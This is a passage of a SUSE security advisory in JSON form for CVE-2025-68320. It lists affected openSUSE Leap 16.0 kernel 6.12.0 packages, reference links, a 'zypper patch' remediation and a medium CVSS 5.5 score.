"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68320",
"url": "https://www.suse.com/security/cve/CVE-2025-68320"
},
{
"category": "external",
"summary": "SUSE Bug 1255172 for CVE-2025-68320",
"url": "https://bugzilla.suse.com/1255172"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
